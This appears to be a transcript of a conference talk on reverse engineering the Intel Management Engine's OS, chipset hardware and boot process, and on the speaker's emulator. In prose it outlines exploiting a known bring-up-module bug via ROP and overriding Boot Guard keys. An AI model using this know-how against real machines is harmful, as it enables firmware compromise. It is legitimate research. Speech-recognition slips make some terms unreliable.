And the functions themselves are just using the normal system 5 x86 calling convention, so it's pretty easy to look at that using your normal tools. There's no weird register argument passing going on here. So right. Those shared libraries, there's two of them, and this is where it gets annoying. The system library, you've got access to that, so you can just take your time and go through it and try to figure out, hey, is this open, or is this read, or what's this function doing? But then there's also another second really large library, which is in ROM. They have all the C library functions and some of their custom helper routines that don't interact with the kernel directly, such as the strings functions. They live in ROM, so when you've got your code, and this is basically where I was at when I was here last year, you're looking through it and you're seeing calls to a function you don't have the code for all over the place, and you have to figure out by its signature what is it doing. And that works for some of the functions. It's really difficult for other ones, so that really happened to start for a while. Then I managed to find one of these ROM bypass images, and I had to code for a very early development build of the ROM. This is where I got lucky. So the actual entry point addresses are fixed across an entire chipset family. So if you have an image for the server version of like the 100 series chipset, or for client version, or for desktop or laptop version, it's all going to be the same ROM address point, sorry, the ROM addresses. So even though the code might be different, you have the jump table, which means the addresses can stay fixed. So this only needs to be done once, and in fact, when I upload my slides later, there is a slide in there at the end that has the addresses for the most used functions. So you're not going to have to repeat that work, at least not for this chipset. So if you want to look at a simple module, you've loaded it, and now you've applied the things I just said, and you still don't have the data sections. In fact, I don't know what that function there is doing, but it's not very important. It actually returns a value, I think, that's not used anywhere, but it must have a purpose because it's there. Right. So then you look at the entry point, and this is a lot of stuff, and the main thing that matters here is on the right half of the screen, there is a listing from a Minix repository, and on the left half there is a disassembly from an ME module. So it's mostly the same. There is one key difference, though. The ME module actually has a little bit of code that runs before this C library startup function, and that function actually does all the ME specific initialization. There's a lot of stuff related to how C library data is kept because there's also no data segments for the C library being allocated by the kernel, so each process actually reserves a part of its own memory and tells the C library like any global variables you can store in there. But when you look at that function, one of the most important things that it calls is this function. It's very simple. It just copies a bunch of RAM. So they don't have support for initialized data sections. It's a flat binary. What they do is they actually use the BSS segment, sort of the zeroed segment at the end of the address space and copy over a bunch of data in the program. The program itself is not aware of this. It's really in the initialization code and in the linker script. 
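That startup copy is the classic "no .data segment, so initializers live at the end of the image" trick. A hedged sketch using conventional linker-script symbol names (the ME's real symbol names and layout are different):

/* Provided by the linker script: where the initializers were placed in
 * the flat image, and where .data is expected to live at run time
 * (inside the otherwise zeroed tail of the address space). */
extern char __data_load_start[];
extern char __data_start[];
extern char __data_end[];

/* Runs from the module's pre-main init code, before the C library is
 * touched, so that globals have their initial values. */
static void copy_initialized_data(void)
{
    const char *src = __data_load_start;
    char *dst = __data_start;

    while (dst < __data_end)
        *dst++ = *src++;
}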
So this is also something that's very important because you're going to need to also add that address in the data section. You're going to need to load the last bit of the binary, otherwise you're missing constants, at least in association values. Right. Then there's the full memory map. To the process itself, it's a flat 32-bit address space. It's got everything you expect in there. It's got the stack and the heap and everything. There's a little bit of heap allocated right on the initialization. This is basically how you derive the address space layout from the metadata. Especially the data segment and the stack itself, the location varies a lot because of the number of threads that they already use or the size of data sections. And also, those stack guards, they're not really stack guards. There's also metadata for each thread in there. But that's not, nothing that's relevant to the process itself, only to the kernel. And well, if you then skip forward a bit and you've done all this, you look at your, at your simple driver, like this is taken from a driver used to talk to the CPU. Like, okay, so when I say CPU or host, by the way, I mean the CPU, like your big Skylake or Kabylake or CoffeeLake, whatever, your big CPU that runs your own operating system. Right. So this is used to send messages there. But if you look at what's going on here, okay, I think I have a problem with the animation here. It sets up some stuff and then it calls a library function that's in the main SISLIP library, which actually has the main loop for the program. That's because Intel was smart and they added a nice framework for device driver implementing programs because it's microkernel, so device drivers are just usual in programs calling specific APIs. Then there's normal POSIX file IO, no standard IO, but it has all the normal open and read on IO, CTL and everything functions. And then there's more initialization for the server library. And this is basically what all the simple drivers look like in it. And then there's this. Because it's so low on memory, they don't actually use standard IO or even printf itself to do most of the debugging. It uses a thing that's called FEN. Oh, touch on that layer. So there's the familiar APIs that I talked about. It even has POSIX threads or at least a subset of it. And there is all the functions that you'd expect to find on some generic UNIX machine. So that shouldn't be too much of a problem to do with. But then there's also their own tracing solution. SVEN, that's what Intel calls it, the names in all the development tools that you can download from their site. Basically, they don't include format strings for a lot of the stuff. They just have a 32-bit identifier that is sent over the debug port. And it refers to a format string in a dictionary that you don't have. Whereas one of the dictionaries for a server chip floating around the internet, but even that is incomplete. And the normal non-NDA version of the developer tools has some 50 format strings for really common status messages it might output. But yeah, like if you see these functions, just realize it's doing some debug print there. It might be dumping some state or just telling it it's going to do something else. It's no important logic actually happens in here. Right. So then for device files, they're actually defined in the manifest. 
When the kernel loads a program and a program wants to expose some kind of interface to other programs, its manifest will contain or its metadata file will contain a special file producer entry. And that says, you know, you have these device files with a name and an access mode and a user group ID and everything. And the minor numbers. And the kernel sends this to the, or not the kernel, the program loader sends this to the virtual file system server and it automatically gets a device file pointing to the right major and minor number. And then there's also a library as I said to provide a framework for a driver. And that looks like this. It's really easy to use if you were a ME developer. You just write some callbacks for open and close and everything and it automatically calls them for you when a message comes in telling you that that happened. Which also makes it really easy to reverse engineer. Because if you look at a driver, it just loads some callbacks and you can know by their offset in the structure what actual call they're implementing. Right. So then there is one of the more weird things that's going on here. How the actual user land programs get access to memory map registers. There's a lot of this going on. It calls to a couple of functions that have some magic arguments. The second one you can easily tell is the offset because it increases in very nice part of two steps. So it's probably the register of sets and then what comes after it looks like a value. And then the first bit seems to be a magic number. Well, it's not. There's also an extension in metadata saying these are the memory map tile ranges. And those ranges, they each list the physical base address and the size and the permissions for them. Then the index in that list does not directly correspond to the magic value. The magic value actually you need to do a little computation on that and then you can access it through those functions. The computation itself might be familiar. Yeah. So these are the functions. The value is a segment selector. So they use them. Actually don't use paging for inter process isolation. They use segments like X86 particular mode segments. And for each memory map I arranged there's a separate segment. You manually specify that. Which is just weird to me. Like why would you use X86 segmenting on a modern system? Minix does it. But yeah, to extend that even to this. Luckily, normal address space is flat. Like to the process. Not to the kernel. Right. So now we can access memory map tile. That's all the really high level stuff. So what's going on under there? It's got all the basic micro kernel stuff. So message passing and then some optimizations to actually make it perform well on a really slow CPU. The basics are you can send a message. You can receive a message and you can send and receive a message where you basically say send a message, wait till a response comes in and then continue which is used to wrap function calls. This is mostly the same as in Minix. There's some subtle changes which I'll get to later. Then memory grants are something that only appeared in Minix really recently. It's a way for a process to basically create a new name for a piece of memory it has and give a different process access to it just by sharing the number. These are referred to by the process ID and the number of that range. So the process IDs are actually a local per process. So to uniquely identify why you need to say process ID plus that number. And they're only granted to a single process. 
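Going back to those MMIO helpers for a second: the "magic number" is just an x86 segment selector, which in general is built as (descriptor index << 3) | table-indicator bit | RPL. Here is a sketch of that computation — which table bit and RPL the ME really uses is an assumption here, not something taken from the code:

#include <stdint.h>

#define SEL_TI_LDT   (1u << 2)     /* table-indicator bit (assumed LDT)   */
#define SEL_RPL(x)   ((x) & 3u)    /* requested privilege level (assumed) */

/* One descriptor per MMIO range listed in the module's metadata; the
 * segment's base and limit then bound every access to its own window.   */
static inline uint16_t mmio_selector(unsigned int range_index)
{
    return (uint16_t)((range_index << 3) | SEL_TI_LDT | SEL_RPL(3));
}

/* The library helpers seen in the disassembly then take (selector,
 * offset, value) and do the actual segment-relative load or store.      */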
So when a process creates one of these, it can't even access it itself unless it creates a grant for itself which it's not really that useful usually. These grants are used to prevent having to copy over all the data inside the IPC message used to implement a system call. These are the basic operations on it. You can create one, you can copy it to and from it. So you can't actually map it. A process that receives one of these has to say to the kernel using a system call, please write this data into that area of memory that belongs to a different process. And then there's also indirect grants because in Minix, they do have this but also only recently and usually if you have a micro kernel system, you would have to copy your buffer for read call first to the file system so you're going to end up back to either the hard disk driver or the device driver that's implementing a device file. So the ME actually allows you to create a grant pointing to a grant that was given to you by someone else. And then that grant will inherit the privileges of the process that creates it combined with those that it assigns to it. So if the process has a read write grant, it can create a read only or write only grant but it cannot, if it only has a read grant, it cannot write writes to it for a different process obviously. So then there's also some big differences from Minix. In Minix, you address the process by its process ID or thread ID with a generation number attached to it. In the ME, you can actually address IPC to a file descriptor. Kernel doesn't actually know a lot about file descriptors, it just implements the basic thing where you have a list of files and then each process has a list of file descriptors assigning integer numbers to those files to refer to them by. And this is used so you can, as a process, you can actually directly talk to a device driver without knowing what its process ID is. So you don't send it to the file system server, you send it to the file descriptor and the kernel just magically corrects it for you. And they move select into the kernel. So you can tell the kernel, hey, I want to wait till the file system server tells me that it has data available or till the message comes in. This is one of the most complicated system cause the ME offers. That's used in a normal program. You can mostly ignore it and just look like, hey, those arguments are the file descriptor sets has a bit of field and then there's the message that might have been received. And there's the ME logs because you don't just want to write to registers, you actually might want to do the direct memory access from hardware. So you can actually tell the kernel to lock one of these memory grants in RAM for you. It won't be swapped out anymore. And yeah, it will even tell you the physical address so you can just load that into a register. And it's not really that complicated. Just lock it, get a physical access right into a register and continue. Well, that's the most important stuff about the operating system. The hardware itself is a lot more complicated cause the operating system, once you have the code, you can just reverse engineer it and get to know it. The hardware, well, let's just say it's a real pain to have to reverse engineer a piece of hardware together with its driver. Like if you've got the driver code but you don't know what the registers do so you don't know what a lot of logic does and you're trying to, you know, figure out what the logic is and what the actual registers do. 
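Before moving on to the hardware side, the grant-plus-DMA flow just described looks roughly like this; every function name here is invented for illustration, these are not the ME's real system-call wrappers:

#include <stddef.h>
#include <stdint.h>

typedef int grant_t;

/* Placeholders standing in for the kernel interfaces described above.   */
grant_t grant_create(void *buf, size_t len, unsigned int access);
int     grant_lock(grant_t g, uint64_t *phys_out);  /* pins it, returns phys addr */
void    dev_write32(unsigned int mmio_range, uint32_t off, uint32_t val);

int start_dma(void *buf, size_t len)
{
    uint64_t phys;
    grant_t g = grant_create(buf, len, /* read|write */ 3u);

    if (g < 0)
        return -1;

    /* Lock the grant so it stays resident in RAM, and get its physical
     * address back from the kernel ...                                   */
    if (grant_lock(g, &phys) < 0)
        return -1;

    /* ... then program that address straight into the device's DMA
     * register through the MMIO helpers from earlier.                    */
    dev_write32(0, 0x10, (uint32_t)phys);
    return 0;
}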
Right, so first you want to know which physical address goes where. The metadata listings I showed you actually had names in there; those are not in the metadata files themselves, I annotated those. You just see the physical address and size. But there's one module, the bus driver module. The bus driver is a normal user process, but it implements stuff like PCI configuration space accesses and those things, and it has a nice table in it with names for devices. So if you just run strings on it, you'll see these things. When I saw this, I was pretty glad, because at least I could make sense of what device was being talked to in a certain program. So the bus driver does all these things: it manages power gating for devices, it manages configuration space access, it manages the different kinds of buses and IOMMUs that are on the system, and it makes sure that a normal driver never has to know any of these details. The driver just asks it for a device by a number assigned to it at build time, and then the bus driver says, okay, here's a range of physical address space that you can now write to. So that's a really nice abstraction. And it also gives us a lot of information, because the really old builds for Sunrise Point actually have a hell of a lot of debug strings in there as printf format strings, not just as catalog IDs; it's one of the only pieces of code in the ME that does this. So that already tells you a lot. And then there's also the table I just talked about, which has the actual info on the devices and their names. I generated some DokuWiki content from this that I use myself, and this is what's in the table, or part of it. It tells you what address the PCI configuration space lives at, it tells you the bus, device and function for it, it tells you on which chipset SKUs they are present using a bit field, and it tells you their names. Other fields also contain the values that are written into the PCI base address registers, so their normal memory ranges as well. And there are even more devices. So the ME has access to a lot of stuff. A lot of it is private to it; a lot of it is components that also exist in the rest of the computer. And there's not a lot of information on a lot of this. These are basically all the resources that are out there, together with the conference slides published by other people who have done research on the ME. I did not have time to add links to those, but they're easy to find on Google. I'll get to this later, but I actually wrote an emulator for the ME, a partial emulator, to be able to run ME code and analyze it, which obviously needs to know a bit about the hardware, so you can look at that. There are some files in Intel's debugger package, specific versions of it, that have really detailed info on some of the devices, though not all of them, and I wrote a tool to parse some of those files. It's really rough code; I published it because people wanted to see what I was doing, but it doesn't work out of the box. And there's a nice talk on this by Mark Ermolov and Maxim Goryachy, I don't know if I'm pronouncing that correctly, but they've done a lot of work on the ME, and this particular talk by them is really useful. And then there's also something else: there is a second ME in server chipsets, the Innovation Engine. It's basically a copy-pasted ME, to provide an ME that the vendor can write code for. I don't think it's used a lot; I've only been able to find HP software that actually targets it.
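As an illustration of how that bus-driver device table can be turned into the DokuWiki pages mentioned above, here is a sketch. The field layout follows the description in the talk (name, configuration-space address, bus/device/function, SKU bit field), but the concrete sample values are made up, not taken from a real firmware image.

```python
# Sketch: turning bus-driver device-table entries into a DokuWiki table.
# The DeviceEntry fields follow the description above; the sample entry is
# invented for illustration only.

from dataclasses import dataclass

@dataclass
class DeviceEntry:
    name: str
    cfg_space_addr: int   # where its PCI configuration space lives
    bus: int
    dev: int
    func: int
    sku_mask: int         # bit field: which chipset SKUs have this device

    def dokuwiki_row(self) -> str:
        bdf = f"{self.bus:02x}:{self.dev:02x}.{self.func}"
        return (f"| {self.name} | {self.cfg_space_addr:#010x} "
                f"| {bdf} | {self.sku_mask:#06x} |")

HEADER = "^ Device ^ Config space ^ B:D.F ^ SKU mask ^"

entries = [
    DeviceEntry("example_gpio", 0xE0000000, 0, 0x1F, 1, 0x0003),  # sample only
]

print(HEADER)
for e in entries:
    print(e.dokuwiki_row())
```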
The Innovation Engine firmware has some more debug strings, but also not a lot. It mostly has a table containing register names, but they're really abbreviated. For a really small subset of the devices there is documentation out there, in a Pentium N- and J-series datasheet. It seems like they compiled their logic code, or whatever it is, with the wrong defines, because it doesn't actually fit into the manual that well; it's just a section with some 20 tables that shouldn't be in there. Right. So this is from the talk I just referenced. It's an overview of the Innovation Engine and the bus bridges and everything in there. This isn't very precise, so based on some of those files from System Studio I tried to get a better understanding of it, which is this. This is the entire chipset. The little DMI block in the top left corner is what connects to your CPU, and all of the big blocks with a lot of ports are bus bridges or switches for the PCI-Express-like fabric. Yeah, so there's a lot going on. The highlighted area is the Management Engine memory space, and the rest of it is the global chipset. The things I've highlighted in green here are on the primary PCI bus. There's this weird thing going on where there seem to be two PCI hierarchies, at least logically. In reality it's not even PCI, but on Intel systems there's a lot of stuff that behaves as if it is PCI, so it has bus, device and function numbers and PCI configuration space registers. And they have two different roots for the configuration space: even though the configuration space address includes a bus number, they have two completely different hierarchies, each of which has its own bus zero. That's weird, also because they don't make sense when you look at how the hardware is actually laid out. So this is the stuff on the primary PCI configuration space, which is directly accessed by the Northbridge on the ME CPU, the Minute IA system agent. System agent is what Intel calls the Northbridge nowadays, now that it's not a separate chip anymore. It's basically just the Northbridge and the crypto unit that's on there, plus the stuff that's directly attached to the Northbridge, being the ROM and the RAM. The processor itself is, as I said, derived from a 486, but it does actually have some more modern features. It does CPUID, at least on my systems; some other researchers said theirs didn't. It's basically the core that's in the Quark MCU, which is really great, because it's one of the only cores made by Intel that has public documentation on how to do run control, so breakpoints and accessing registers and everything, over JTAG. Intel doesn't publish this stuff except for the Quark MCUs, because those were targeted at makers, but they reuse that core in here, which is really useful. It even has an official port to the OpenOCD debugger, which I have not gotten to test because I don't have a JTAG probe that is compatible with Intel voltage levels and supported by OpenOCD. And it also has, like I said, CPUID and MSRs, and it has some really fancy features like branch tracing and some stricter paging-permission enforcement stuff. They don't use the interrupt pins on this. It's an IP block, and there are some files out there, that's where this screenshot is from, that are used by a built-in logic analyzer Intel has on the chipset.
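To make the "two roots, each with its own bus zero" point concrete, here is a toy helper that packs bus, device, function and register into a flat configuration-space offset the conventional ECAM way. The ME's actual access mechanism is not documented here, and the two base addresses are placeholders.

```python
# Toy illustration of two separate PCI configuration-space hierarchies,
# each with its own bus 0. The ECAM-style packing below is the conventional
# PCI encoding; the two base addresses are placeholders, not real ME values.

PRIMARY_CFG_BASE = 0xE000_0000   # hypothetical: primary hierarchy
FIXED_CFG_BASE   = 0xF000_0000   # hypothetical: the "PCI fixed bus" hierarchy

def cfg_address(base: int, bus: int, dev: int, func: int, reg: int) -> int:
    """Pack bus/device/function/register into a flat config-space offset."""
    assert bus < 256 and dev < 32 and func < 8 and reg < 4096
    return base | (bus << 20) | (dev << 15) | (func << 12) | reg

# The same bus 0, device 2, function 0 resolves to two different devices
# depending on which root you go through:
print(hex(cfg_address(PRIMARY_CFG_BASE, 0, 2, 0, 0)))
print(hex(cfg_address(FIXED_CFG_BASE, 0, 2, 0, 0)))
```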
With that logic analyzer you can select different signals on the chip to watch, which is a really great source of information on how the IP blocks are laid out and what signals are in there, because you basically get a tree view of the IP blocks in the chip and some of their signals. They don't use the legacy interrupt system; they only use message-based interrupts, where the device writes a value into a register on the interrupt controller instead of asserting a pin. And then there's the Northbridge. The Northbridge is partially documented in that datasheet I mentioned. It does support the x86 I/O address space, but it's never used; everything in the ME is memory space, or exposed as memory space through bridges. The Northbridge implements access to the ROM, and it has an IOMMU which is only used for transactions coming from the rest of the system and which, at least in the firmware I looked at, is always initialized to the inverse of the page table, so linear addresses can be used for DMA. It also does PCI configuration space access to the primary PCI bus, and it has a firewall that actually allows the operating system to deny any IP block in the chipset from sending a completion on a bus request. So it can actually say: hey, I want to read some register, and only these devices are allowed to send me a value for it. So they've actually thought about security here, which is great. And there's one of the most important blocks in the ME, which is the crypto engine. It does some of the more well-known crypto algorithms, AES, SHA hashes, RSA, and it has a secure key store, which I'm not going to talk a lot about here; there's more on it in their ME talk at Black Hat. A lot of these things have DMA engines, which all seem to be the same, and there are no other DMA engines in the ME, so these are also used for memory-to-memory copies or DMA into other devices. So they're used in a lot of things. This is a diagram which I don't have the vector version of anymore, so that's why the LibreOffice background is in there, I'm sorry. This is basically what that crypto engine looks like when you look at the signal tree I was talking about earlier. The DMA engines are both able to do memory-to-memory copies and to directly target the crypto unit they're part of. Basically, I don't know about the control bits that go with this, but when you set the target address to zero and the right control bits, it will copy into the buffer that's used for the encryption. So that is how it accelerates memory access for crypto. And these are the actual register offsets; they're the same for all of the DMA engines in there, relative to the base address of the subunit they're in. And then there's the second PCI bus, or bus hierarchy, which in some places is called the PCI fixed bus. I'm actually not entirely sure whether this is really implemented as a PCI bus as I've drawn it here, but this is what it behaves like. It has all the ME-private stuff that's not a part of the normal chipset: it has timers for the ME, it has the implementation of the SGX enclave stuff, the firmware TPM registers, and it has the gen device, which I've mostly ignored because it's only used at boot time; it's mostly only used by the actual boot ROM of the ME. It is what the ME uses to get the fuses Intel burns, so that's the Intel public key and whether it's a production or pre-production part, but it's pretty much a black box. It's not used that much, fortunately.
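Here is a rough sketch of what driving one of those identical DMA engines might look like, based only on the description above, where a destination of zero plus the right control bits feeds the crypto buffer. All register offsets and control bits are hypothetical placeholders; the real offsets are on the slide and are not reproduced here.

```python
# Sketch of programming one of the (identical) DMA engines described above.
# All register offsets and control bits are hypothetical placeholders; only
# the overall flow (source, destination, size, kick off; destination 0 plus a
# control bit targets the crypto buffer) follows the talk.

DMA_SRC_LO  = 0x00   # hypothetical register offsets, relative to the base
DMA_DST_LO  = 0x08   # address of the subunit the engine belongs to
DMA_SIZE    = 0x10
DMA_CONTROL = 0x18
CTRL_START         = 1 << 0   # hypothetical control bits
CTRL_DST_IS_CRYPTO = 1 << 1

def write32(addr: int, value: int) -> None:
    # Stand-in for an MMIO write (e.g. forwarded to an emulator or debugger).
    print(f"mmio[{addr:#010x}] <- {value:#010x}")

def dma_copy(engine_base: int, src: int, dst: int, size: int,
             to_crypto: bool = False) -> None:
    """Memory-to-memory copy, or a copy into the crypto unit's buffer."""
    ctrl = CTRL_START | (CTRL_DST_IS_CRYPTO if to_crypto else 0)
    write32(engine_base + DMA_SRC_LO, src)
    write32(engine_base + DMA_DST_LO, 0 if to_crypto else dst)
    write32(engine_base + DMA_SIZE, size)
    write32(engine_base + DMA_CONTROL, ctrl)

dma_copy(0x1000_0000, src=0x2000_0000, dst=0, size=0x40, to_crypto=True)
```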
There's the IPC block, which allows the ME to talk to the sensor hub, which is a different CPU in the chipset, and to the power management controller and all kinds of other embedded CPUs. So it's inter-processor communication, not inter-process; that confused me for a bit. And there's the host embedded controller interface, which is how the ME talks to the rest of the computer when it wants the computer to know that it's talking. It can directly access a lot of stuff, but when it wants to send a message to the EFI or to Windows or Linux, it'll use this. It also has status registers, which are really simple things where the ME writes in a value, and even if the ME crashes the host can still read that value. This is actually how you can see whether the ME is running, whether it's disabled, whether it fully booted, or whether it crashed halfway through but at a point where it could still get the rest of the computer running. There is some coreboot code to read it, and I've also implemented some decoding for it in the emulator, because it's useful to see what those values mean. Right. Then there's something really interesting, the primary address translation table, which is the bus bridge that allows the ME to actually access the PCI Express fabric of the computer. For a lot of what I call, in this table, ME peripherals, which are actually outside the ME domain in the chipset, it uses this to access them. It also uses it to access the UMA, which is an area of host RAM that's used as a swap device for the ME, and the Trace Hub, which is the debug port. But it also has a couple of windows which allow the ME to access any random area of host RAM, which is the most scary bit: the UMA is specified by the host, but those host DRAM windows you can just point anywhere, and you can read or write any value that Windows or Linux or whatever you're running has sitting there. So that's scary to me. Right. And then there's the rest of the devices, the ones behind the primary ATT, and that's a lot of stuff. That's debug stuff, that's also the normal peripherals that your PC has, but it also includes things like the power management controller, which actually turns on and off all the different parts of your computer and controls clocks and reset. So this is really important. There's a concept that you'll come across when you're reading Intel manuals or ME-related stuff, which is root spaces. Besides the normal addressing information for a PCI device, there's also a root space number, which is basically how you have a single PCI device exposing two completely different address spaces. It's zero for the host and one for the ME. Some devices expose the same information in both; other ones behave completely differently. But yeah, that's something you don't usually see. And then there's the sideband fabric. Besides all the stuff that I just covered, which is at least PCI-like, there's also something completely different, the sideband fabric, which is a completely packet-switched network where you don't use any memory mapping by default. You just have a one-byte address for a device and some other addressing fields, and you just send it a message saying, hey, I want to read configuration or data or memory. And there's actually a lot of information out there on this, because it seems like Intel just copy-pasted their internal specification into a patent. This is how you address it, and these are all the devices on there, which is quite a lot.
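Those host-readable status registers lend themselves to a small decoder like the sketch below. The bit layout used here is an assumed, simplified one for illustration, loosely modelled on the fields coreboot prints; the emulator and the coreboot sources are the place to look for the authoritative definitions.

```python
# Sketch: decoding an ME host firmware status value into something readable.
# The field layout below is an assumed, simplified layout for illustration
# (working state, error code, operation mode); it is not a verbatim copy of
# the real register definition.

WORKING_STATES = {0: "reset", 5: "normal", 6: "disabled (disable wait)"}
ERROR_CODES    = {0: "no error", 3: "image failure"}

def decode_status(value: int) -> dict:
    return {
        "working_state": WORKING_STATES.get(value & 0xF,
                                            f"unknown ({value & 0xF})"),
        "error_code": ERROR_CODES.get((value >> 12) & 0xF,
                                      f"unknown ({(value >> 12) & 0xF})"),
        "operation_mode": (value >> 16) & 0xF,
    }

# Example: a value read by the host from the HECI device's config space.
print(decode_status(0x0000_0245))
```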
The sideband fabric is also what you, if any of you are kernel developers and have had to deal with GPIOs on Intel SoCs, know through the P2SB device: that's what the host uses to access it, and the documentation on it is really, really bad. Right. So this was all done using static analysis, but then I wanted to figure out how some of the logic actually worked, and it was really complicated, so I wanted to play around with the ME. There was this nice talk by Ermolov and Goryachy where they said: we found an exploit that gives you code execution, and you can get JTAG access with it. That sounds really nice. It's actually not that easy. So, arbitrary code execution in the bring-up (BUP) module: they actually described their exploit and how you should use it, but they didn't describe anything that's needed to actually implement it. If you want to do that, you need to figure out where the stack lives. You need to write a payload that turns a buffer overflow, on a stack that by the way uses stack cookies, so you can't just overwrite the return address, into an arbitrary write. You need to find out at what address the return pointer lives so you can overwrite it. You need to find ROP gadgets, because the stack is not executable. Right. And then, when you've done that, you can just turn on debug access, or chainload a custom firmware, or whatever. So, I had a bit of trouble getting that running, and in order to test your payload you have to flash it into the system, which takes a while, and then the system just doesn't power on if the ME is not working, if you're crashing it instead of getting code execution. So it's not really viable to develop it that way, I think. Some people did; I respect that, because it's really, really hard. Then I wrote this: ME loader. It's called loader because at first I started out writing it as sort of a Wine-like thing, where you would just map the right ranges at the right places, jump into the code, execute it, and patch some system calls. But because the ME is a microkernel system and almost every user-space program accesses hardware directly, it ended up implementing a good part of the chipset, at least as stubs, or with enough logic to get the code running. And I later added some features that actually allow it to talk to hardware. I can use it as a debugger, because it's actually running the ME firmware, or parts of it, inside a normal Linux process, so I can just use GDB to debug it. And back in April last year, I got that working to the point where I could run the bring-up process, which is where the vulnerability is, and then you just develop the exploit against that, which I did. And then I made a mistake cleaning up some old chroot environments for closed-source software, and I nuked my home dir. Yeah. I hadn't yet pushed everything to GitHub, so I was stuck with an old version, and I decided, you know, let's refactor this and turn it into something that might actually get published at some point, which by the way I did last summer; this is all public code, the ME loader thing, it's on GitHub. And someone else beat me to it and replicated that exploit by the Russian guys, who up to then had only produced a proof-of-concept for Apollo Lake chipsets, which is completely different from what you have to do for the normal ME. So I was actually a bit disappointed by that, not being the first one to replicate it.
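The core idea behind that loader, running ME user-space code inside a normal Linux process while stubbing out its hardware accesses, can be sketched as a tiny MMIO dispatcher. This is a deliberately simplified illustration of the approach, not code taken from the actual ME loader project.

```python
# Simplified illustration of the emulator/loader idea described above:
# map address ranges to handlers so that firmware code running inside a
# normal process gets plausible answers for its hardware accesses.

class MmioBus:
    def __init__(self):
        self.ranges = []  # (base, size, read_fn, write_fn)

    def register(self, base, size, read_fn, write_fn):
        self.ranges.append((base, size, read_fn, write_fn))

    def _find(self, addr):
        for base, size, rd, wr in self.ranges:
            if base <= addr < base + size:
                return base, rd, wr
        raise KeyError(f"unmapped MMIO access at {addr:#x}")

    def read32(self, addr):
        base, rd, _ = self._find(addr)
        return rd(addr - base)

    def write32(self, addr, value):
        base, _, wr = self._find(addr)
        wr(addr - base, value)

# A stub device that just logs writes and returns a constant for reads,
# enough to let code that polls a "ready" bit make progress.
def stub_read(offset):
    return 0x1  # pretend the device is always ready

def stub_write(offset, value):
    print(f"stub device write: +{offset:#x} = {value:#x}")

bus = MmioBus()
bus.register(0xE010_0000, 0x1000, stub_read, stub_write)  # hypothetical range
bus.write32(0xE010_0004, 0xDEAD_BEEF)
print(hex(bus.read32(0xE010_0000)))
```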
But then, about a week later, I got my loader back to the point where I could actually get to the vulnerable code, developed the exploit, and got it working not too long after. And here's the great thing: then I went to the hackerspace and flashed it into my laptop, the image that I had just been using on the emulator. I didn't change it. I flashed it thinking, this is never going to work, and it worked. And I've still got an image on a flash chip with me, because that's what I used to actually turn on the debugger. And then you need a debug probe, because the USB-based debugging stuff that's mentioned here only works pretty late in boot, which is also why they only released the Apollo Lake stuff, because on those chipsets you can actually use it for the ME. And then you need this thing, because there's a second channel that uses a USB plug but a completely different physical layer, and you need an adapter for it, which I don't think was intended to be publicly available, because if you go to Intel's site and say I want to buy this, they say: here's the CNDA, please sign it. But it appeared on Mouser, and luckily I knew some people who had done some other stuff, got a nice bounty for it, bought it and let me use it. Thanks. It's expensive, but you can buy it, if it's still up there; I haven't checked. That's the link. So, I'm a bit late, so I'm going to use the time for questions as well. The main thing the ME does that you cannot replace is the boot process. It's not just that the system breaks if you don't turn it on; it actually does stuff that has to be done. So you're going to have to use the ME anyway if you want to boot a computer. You don't necessarily have to use Intel's firmware, though. The ME itself boots like a microkernel system, so it has a process which implements a lot of the services needed to get to the point where it can start the actual servers. This process has very high privileges in older versions, which is what's in use on these chipsets. If you exploit it, you're still ring three, but you can turn on the debugger and use the debugger to become ring zero. So this is what the normal boot process for a computer looks like, and this is what happens when you use Boot Guard: there's a bit of code that runs even before the reset vector, and that's started by microcode initialization, of course. And this is what actually happens: the ME loads a new firmware into the power management controller, it then readies some stuff in the chipset, and it tells the power management controller, please stop pulling that CPU reset pin low, and the CPU will start. The power management controller is a completely independent thing. It's an 8051-derived microcontroller, and it runs a real-time operating system from the 90s; that's the only string in its firmware, by the way, that's quoted there. Depending on the chipset you have, it's either loaded with a patch or with a complete binary from the ME, and it does a lot of important stuff. There's no documentation on it besides the ACPI interface, which is not really that useful. The ME has to do these things: it needs to load the keys for the Boot Guard process, it needs to set up clock controllers and then tell the PMC to turn on the power to the CPU, and it needs to configure the PCI Express fabric and get the CPU to come out of reset. There's a lot of code involved in this, so I really didn't want to do it all statically. What I did is add hardware pass-through support to the emulator and boot my laptop that way.
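That pass-through and replay idea reduces to replaying a log of traced register accesses through some debug backend, as in the sketch below. The trace entries and the backend interface are invented placeholders; the real script drives an actual halted ME over a debug probe.

```python
# Shape of the "replay traced hardware accesses" approach described above.
# The trace entries and the DebugBackend interface are placeholders only.

class DebugBackend:
    """Stand-in for a halted ME reachable over a debug probe."""
    def write32(self, addr, value):
        print(f"write {addr:#010x} <- {value:#010x}")

    def read32(self, addr):
        print(f"read  {addr:#010x}")
        return 0

# A traced boot sequence would be a long list of entries like these
# (addresses and values here are made up for illustration).
TRACE = [
    ("w", 0xE00D_0000, 0x0000_0001),   # e.g. ungate a clock
    ("r", 0xE00D_0004, None),          # e.g. poll a status register
    ("w", 0xE00E_0010, 0x0000_0000),   # e.g. tell the PMC to release reset
]

def replay(backend: DebugBackend, trace) -> None:
    for op, addr, value in trace:
        if op == "w":
            backend.write32(addr, value)
        else:
            backend.read32(addr)

replay(DebugBackend(), TRACE)
```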
I actually had a video of that pass-through boot, but I don't have the time to show it, which is a pity. This is what I had going on: the bring-up process from the ME running in a Linux process, sending whatever hardware accesses it was trying to do that are important for boot to the debugger, and the debugger was then using an ME in real hardware, which was halted, to actually do the register accesses. And it worked; it actually booted the computer reliably. The Boot Guard configuration is fun, because they say they fuse in the keys, well, yeah, but the ME loads them from fuses and then manually loads them into a register. If you have code execution on the ME before it does this, you can just load your own values, and you can run coreboot even on a machine that has Boot Guard. I'm going to go through this really quickly: these are the registers that configure what security model the CPU is going to enforce for the firmware. I'm going to release this code after my talk. It's part of a Python script that I wrote that uses the debugger to start the CPU without ME firmware. I traced all the accesses the ME firmware did, and I now have a Python script that can just start the computer without Intel's code. If you translate this into a ROP sequence, or even into a binary for the ME, you can start a computer without the ME itself, or at least without it running its operating system. So yeah, future goals: I really do want to share this, because if there is a way to escalate to ring zero through the ROP chain, then you could just start your own kernel on the ME and have custom firmware, at least from the vulnerability onwards. But you could also build a mod chip that uses the debugger interface to load a new firmware. There are lots of possibilities to be explored, and I'm going to hang out at the open source firmware village later, at least part of the week here, because I really want to get started on an open-source ME firmware using this. Right. And there are a lot of people who played a role in getting me to this point. I'd also like to thank a guy from my hackerspace, Pino Alpha, who basically allowed me to use his laptop to prepare the demo, which I ended up not being able to show. 